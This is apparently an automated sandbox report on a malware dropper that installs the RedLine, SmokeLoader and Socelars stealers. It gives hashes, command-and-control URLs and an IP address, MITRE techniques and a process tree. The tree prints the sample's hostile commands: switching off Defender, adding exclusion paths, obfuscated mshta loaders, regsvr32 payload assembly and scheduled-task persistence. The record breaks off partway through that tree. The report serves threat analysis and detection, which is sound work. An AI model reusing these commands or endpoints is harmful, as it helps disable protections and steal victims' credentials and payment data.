redline | 62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

Target

setup_x86_x64_install.exe
Size

4.5MB
MD5

3da25ccfa9c258e3ae26854391531c7b
SHA1

1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
SHA256

62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
SHA512

defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c

Score

10^/10

redline smokeloader socelars somebody aspackv2 backdoor infostealer spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32

Extracted

Family

redline

Botnet

SomeBody

185.215.113.29:36224

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2536	2360	rundll32.exe	105

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

resource	yara_rule
behavioral1/memory/2144-249-0x00000000008A0000-0x00000000008BC000-memory.dmp	family_redline
behavioral1/memory/2144-250-0x0000000002190000-0x00000000021AB000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0006000000012206-104.dat	family_socelars
behavioral1/files/0x0006000000012206-183.dat	family_socelars
behavioral1/files/0x0006000000012206-162.dat	family_socelars

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x00060000000121f5-71.dat	aspack_v212_v242
behavioral1/files/0x00060000000121f4-73.dat	aspack_v212_v242
behavioral1/files/0x00060000000121f4-74.dat	aspack_v212_v242
behavioral1/files/0x00060000000121f5-72.dat	aspack_v212_v242
behavioral1/files/0x00060000000121f7-77.dat	aspack_v212_v242
behavioral1/files/0x00060000000121f7-78.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

pid	Process
508	setup_installer.exe
1272	setup_install.exe
1656	Sun033e271e0ce96c08.exe
548	Sun03f0dc4460bc9.exe
1596	Sun0324aba28588c0.exe
432	Sun03e4aeb7e43a1c.exe
636	Sun038aa349e3318e.exe
1496	Sun03d477f1a31.exe
1760	Sun03ea09aa5c9686e5.exe
1700	Sun0351a0558292.exe
1728	Sun03f5d51697d04.exe
1932	Sun039750b00c.exe
2004	Sun0328255c4bce6fb.exe
2288	Sun03f5d51697d04.tmp

Loads dropped DLL 47 IoCs

pid	Process
584	setup_x86_x64_install.exe
508	setup_installer.exe
508	setup_installer.exe
508	setup_installer.exe
508	setup_installer.exe
508	setup_installer.exe
508	setup_installer.exe
1272	setup_install.exe
1272	setup_install.exe
1272	setup_install.exe
1272	setup_install.exe
1272	setup_install.exe
1272	setup_install.exe
1272	setup_install.exe
1272	setup_install.exe
1928	cmd.exe
1928	cmd.exe
1940	cmd.exe
1940	cmd.exe
1656	Sun033e271e0ce96c08.exe
1656	Sun033e271e0ce96c08.exe
304	cmd.exe
304	cmd.exe
1172	cmd.exe
1736	cmd.exe
1736	cmd.exe
284	cmd.exe
548	Sun03f0dc4460bc9.exe
548	Sun03f0dc4460bc9.exe
1596	Sun0324aba28588c0.exe
1596	Sun0324aba28588c0.exe
1668	cmd.exe
432	Sun03e4aeb7e43a1c.exe
432	Sun03e4aeb7e43a1c.exe
636	Sun038aa349e3318e.exe
636	Sun038aa349e3318e.exe
1216	cmd.exe
1956	cmd.exe
1888	cmd.exe
1660	cmd.exe
1728	Sun03f5d51697d04.exe
1728	Sun03f5d51697d04.exe
1932	Sun039750b00c.exe
1932	Sun039750b00c.exe
1496	Sun03d477f1a31.exe
1496	Sun03d477f1a31.exe
1728	Sun03f5d51697d04.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
57	freegeoip.app
58	freegeoip.app
60	freegeoip.app
12	ip-api.com
38	ipinfo.io
39	ipinfo.io
55	freegeoip.app

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2608	1496	WerFault.exe	55
2932	636	WerFault.exe	61
2456	2020	WerFault.exe	110
976	2036	WerFault.exe	119

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
768	schtasks.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2824	taskkill.exe
2768	taskkill.exe
1084	taskkill.exe
3044	taskkill.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1596	Sun0324aba28588c0.exe
1596	Sun0324aba28588c0.exe
1404	Process not Found
1404	Process not Found
1404	Process not Found
1404	Process not Found
1404	Process not Found
1404	Process not Found
1404	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1596	Sun0324aba28588c0.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1496	Sun03d477f1a31.exe
Token: SeAssignPrimaryTokenPrivilege	1496	Sun03d477f1a31.exe
Token: SeLockMemoryPrivilege	1496	Sun03d477f1a31.exe
Token: SeIncreaseQuotaPrivilege	1496	Sun03d477f1a31.exe
Token: SeMachineAccountPrivilege	1496	Sun03d477f1a31.exe
Token: SeTcbPrivilege	1496	Sun03d477f1a31.exe
Token: SeSecurityPrivilege	1496	Sun03d477f1a31.exe
Token: SeTakeOwnershipPrivilege	1496	Sun03d477f1a31.exe
Token: SeLoadDriverPrivilege	1496	Sun03d477f1a31.exe
Token: SeSystemProfilePrivilege	1496	Sun03d477f1a31.exe
Token: SeSystemtimePrivilege	1496	Sun03d477f1a31.exe
Token: SeProfSingleProcessPrivilege	1496	Sun03d477f1a31.exe
Token: SeIncBasePriorityPrivilege	1496	Sun03d477f1a31.exe
Token: SeCreatePagefilePrivilege	1496	Sun03d477f1a31.exe
Token: SeCreatePermanentPrivilege	1496	Sun03d477f1a31.exe
Token: SeBackupPrivilege	1496	Sun03d477f1a31.exe
Token: SeRestorePrivilege	1496	Sun03d477f1a31.exe
Token: SeShutdownPrivilege	1496	Sun03d477f1a31.exe
Token: SeDebugPrivilege	1496	Sun03d477f1a31.exe
Token: SeAuditPrivilege	1496	Sun03d477f1a31.exe
Token: SeSystemEnvironmentPrivilege	1496	Sun03d477f1a31.exe
Token: SeChangeNotifyPrivilege	1496	Sun03d477f1a31.exe
Token: SeRemoteShutdownPrivilege	1496	Sun03d477f1a31.exe
Token: SeUndockPrivilege	1496	Sun03d477f1a31.exe
Token: SeSyncAgentPrivilege	1496	Sun03d477f1a31.exe
Token: SeEnableDelegationPrivilege	1496	Sun03d477f1a31.exe
Token: SeManageVolumePrivilege	1496	Sun03d477f1a31.exe
Token: SeImpersonatePrivilege	1496	Sun03d477f1a31.exe
Token: SeCreateGlobalPrivilege	1496	Sun03d477f1a31.exe
Token: 31	1496	Sun03d477f1a31.exe
Token: 32	1496	Sun03d477f1a31.exe
Token: 33	1496	Sun03d477f1a31.exe
Token: 34	1496	Sun03d477f1a31.exe
Token: 35	1496	Sun03d477f1a31.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 584 wrote to memory of 508	584	setup_x86_x64_install.exe	28
PID 584 wrote to memory of 508	584	setup_x86_x64_install.exe	28
PID 584 wrote to memory of 508	584	setup_x86_x64_install.exe	28
PID 584 wrote to memory of 508	584	setup_x86_x64_install.exe	28
PID 584 wrote to memory of 508	584	setup_x86_x64_install.exe	28
PID 584 wrote to memory of 508	584	setup_x86_x64_install.exe	28
PID 584 wrote to memory of 508	584	setup_x86_x64_install.exe	28
PID 508 wrote to memory of 1272	508	setup_installer.exe	29
PID 508 wrote to memory of 1272	508	setup_installer.exe	29
PID 508 wrote to memory of 1272	508	setup_installer.exe	29
PID 508 wrote to memory of 1272	508	setup_installer.exe	29
PID 508 wrote to memory of 1272	508	setup_installer.exe	29
PID 508 wrote to memory of 1272	508	setup_installer.exe	29
PID 508 wrote to memory of 1272	508	setup_installer.exe	29
PID 1272 wrote to memory of 2036	1272	setup_install.exe	31
PID 1272 wrote to memory of 2036	1272	setup_install.exe	31
PID 1272 wrote to memory of 2036	1272	setup_install.exe	31
PID 1272 wrote to memory of 2036	1272	setup_install.exe	31
PID 1272 wrote to memory of 2036	1272	setup_install.exe	31
PID 1272 wrote to memory of 2036	1272	setup_install.exe	31
PID 1272 wrote to memory of 2036	1272	setup_install.exe	31
PID 1272 wrote to memory of 1552	1272	setup_install.exe	32
PID 1272 wrote to memory of 1552	1272	setup_install.exe	32
PID 1272 wrote to memory of 1552	1272	setup_install.exe	32
PID 1272 wrote to memory of 1552	1272	setup_install.exe	32
PID 1272 wrote to memory of 1552	1272	setup_install.exe	32
PID 1272 wrote to memory of 1552	1272	setup_install.exe	32
PID 1272 wrote to memory of 1552	1272	setup_install.exe	32
PID 1272 wrote to memory of 284	1272	setup_install.exe	34
PID 1272 wrote to memory of 284	1272	setup_install.exe	34
PID 1272 wrote to memory of 284	1272	setup_install.exe	34
PID 1272 wrote to memory of 284	1272	setup_install.exe	34
PID 1272 wrote to memory of 284	1272	setup_install.exe	34
PID 1272 wrote to memory of 284	1272	setup_install.exe	34
PID 1272 wrote to memory of 284	1272	setup_install.exe	34
PID 1272 wrote to memory of 1928	1272	setup_install.exe	33
PID 1272 wrote to memory of 1928	1272	setup_install.exe	33
PID 1272 wrote to memory of 1928	1272	setup_install.exe	33
PID 1272 wrote to memory of 1928	1272	setup_install.exe	33
PID 1272 wrote to memory of 1928	1272	setup_install.exe	33
PID 1272 wrote to memory of 1928	1272	setup_install.exe	33
PID 1272 wrote to memory of 1928	1272	setup_install.exe	33
PID 1272 wrote to memory of 1660	1272	setup_install.exe	35
PID 1272 wrote to memory of 1660	1272	setup_install.exe	35
PID 1272 wrote to memory of 1660	1272	setup_install.exe	35
PID 1272 wrote to memory of 1660	1272	setup_install.exe	35
PID 1272 wrote to memory of 1660	1272	setup_install.exe	35
PID 1272 wrote to memory of 1660	1272	setup_install.exe	35
PID 1272 wrote to memory of 1660	1272	setup_install.exe	35
PID 1552 wrote to memory of 1732	1552	cmd.exe	36
PID 1552 wrote to memory of 1732	1552	cmd.exe	36
PID 1552 wrote to memory of 1732	1552	cmd.exe	36
PID 1552 wrote to memory of 1732	1552	cmd.exe	36
PID 1552 wrote to memory of 1732	1552	cmd.exe	36
PID 1552 wrote to memory of 1732	1552	cmd.exe	36
PID 1552 wrote to memory of 1732	1552	cmd.exe	36
PID 1272 wrote to memory of 304	1272	setup_install.exe	37
PID 1272 wrote to memory of 304	1272	setup_install.exe	37
PID 1272 wrote to memory of 304	1272	setup_install.exe	37
PID 1272 wrote to memory of 304	1272	setup_install.exe	37
PID 1272 wrote to memory of 304	1272	setup_install.exe	37
PID 1272 wrote to memory of 304	1272	setup_install.exe	37
PID 1272 wrote to memory of 304	1272	setup_install.exe	37
PID 2036 wrote to memory of 1672	2036	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:584
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:508
- - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2036
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        
        PID:1672
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1552
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
      4⤵
      Loads dropped DLL
      PID:1928
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun033e271e0ce96c08.exe
        
        Sun033e271e0ce96c08.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
      4⤵
      Loads dropped DLL
      PID:284
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03d477f1a31.exe
        
        Sun03d477f1a31.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 1404
        6⤵
        Program crash
        
        PID:2608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
      4⤵
      Loads dropped DLL
      PID:1660
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun039750b00c.exe
        
        Sun039750b00c.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1932
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun039750b00c.exe"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))
        6⤵
        
        PID:2404
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
      4⤵
      Loads dropped DLL
      PID:304
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f0dc4460bc9.exe
        
        Sun03f0dc4460bc9.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:548
      - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f0dc4460bc9.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f0dc4460bc9.exe
        6⤵
        
        PID:3028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
      4⤵
      Loads dropped DLL
      PID:1736
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03e4aeb7e43a1c.exe
        
        Sun03e4aeb7e43a1c.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:432
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2748264892.exe"
        6⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\2748264892.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2748264892.exe"
        7⤵
        
        PID:2740
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1811167986.exe"
        6⤵
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\1811167986.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1811167986.exe"
        7⤵
        
        PID:2144
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03e4aeb7e43a1c.exe" & exit
        6⤵
        
        PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
      4⤵
      PID:1904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
      4⤵
      Loads dropped DLL
      PID:1940
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun0324aba28588c0.exe
        
        Sun0324aba28588c0.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
      4⤵
      Loads dropped DLL
      PID:1172
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun038aa349e3318e.exe
        
        Sun038aa349e3318e.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:636
      - C:\Users\Admin\Pictures\Adobe Films\6rtTqxiXxQGxLyfS32No3xpY.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6rtTqxiXxQGxLyfS32No3xpY.exe"
        6⤵
        
        PID:2728
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 1460
        6⤵
        Program crash
        
        PID:2932
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
      4⤵
      Loads dropped DLL
      PID:1216
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun0351a0558292.exe
        
        Sun0351a0558292.exe
        5⤵
        Executes dropped EXE
        
        PID:1700
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
      4⤵
      Loads dropped DLL
      PID:1668
    - - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03ea09aa5c9686e5.exe
        
        Sun03ea09aa5c9686e5.exe
        5⤵
        Executes dropped EXE
        
        PID:1760
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        7⤵
        
        PID:2520
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        8⤵
        
        PID:1600
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:2344
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        10⤵
        Creates scheduled task(s)
        
        PID:768
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
        7⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Roaming\6545311.exe
        
        "C:\Users\Admin\AppData\Roaming\6545311.exe"
        8⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Roaming\2542301.exe
        
        "C:\Users\Admin\AppData\Roaming\2542301.exe"
        8⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Roaming\1053634.exe
        
        "C:\Users\Admin\AppData\Roaming\1053634.exe"
        8⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Roaming\6673776.exe
        
        "C:\Users\Admin\AppData\Roaming\6673776.exe"
        8⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        9⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Roaming\8899013.exe
        
        "C:\Users\Admin\AppData\Roaming\8899013.exe"
        8⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Roaming\8076700.exe
        
        "C:\Users\Admin\AppData\Roaming\8076700.exe"
        8⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        
        PID:2840
        
        C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
        7⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 952
        8⤵
        Program crash
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        7⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        7⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:2708
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:2032
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
        7⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        7⤵
        
        PID:2036
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2036 -s 1376
        8⤵
        Program crash
        
        PID:976
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
      4⤵
      Loads dropped DLL
      PID:1888
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
      4⤵
      Loads dropped DLL
      PID:1956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
      4⤵
      PID:1620

C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun0328255c4bce6fb.exe
Sun0328255c4bce6fb.exe
1⤵
- Executes dropped EXE
PID:2004
- C:\ProgramData\215894.exe
  "C:\ProgramData\215894.exe"
  2⤵
  PID:2528
- C:\ProgramData\7898954.exe
  "C:\ProgramData\7898954.exe"
  2⤵
  PID:2580
- C:\ProgramData\6614673.exe
  "C:\ProgramData\6614673.exe"
  2⤵
  PID:2752
- C:\ProgramData\7969779.exe
  "C:\ProgramData\7969779.exe"
  2⤵
  PID:2464
- C:\ProgramData\786101.exe
  "C:\ProgramData\786101.exe"
  2⤵
  PID:2820
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\ProgramData\786101.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\ProgramData\786101.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C copy /y "C:\ProgramData\786101.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\ProgramData\786101.exe") do taskkill /im "%~nxT" /f
      4⤵
      PID:2040
    - - C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE
        
        LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj
        5⤵
        
        PID:2260
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )
        6⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f
        7⤵
        
        PID:3008
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )
        6⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S
        7⤵
        
        PID:2688
        
        C:\Windows\SysWOW64\cmd.exe
        
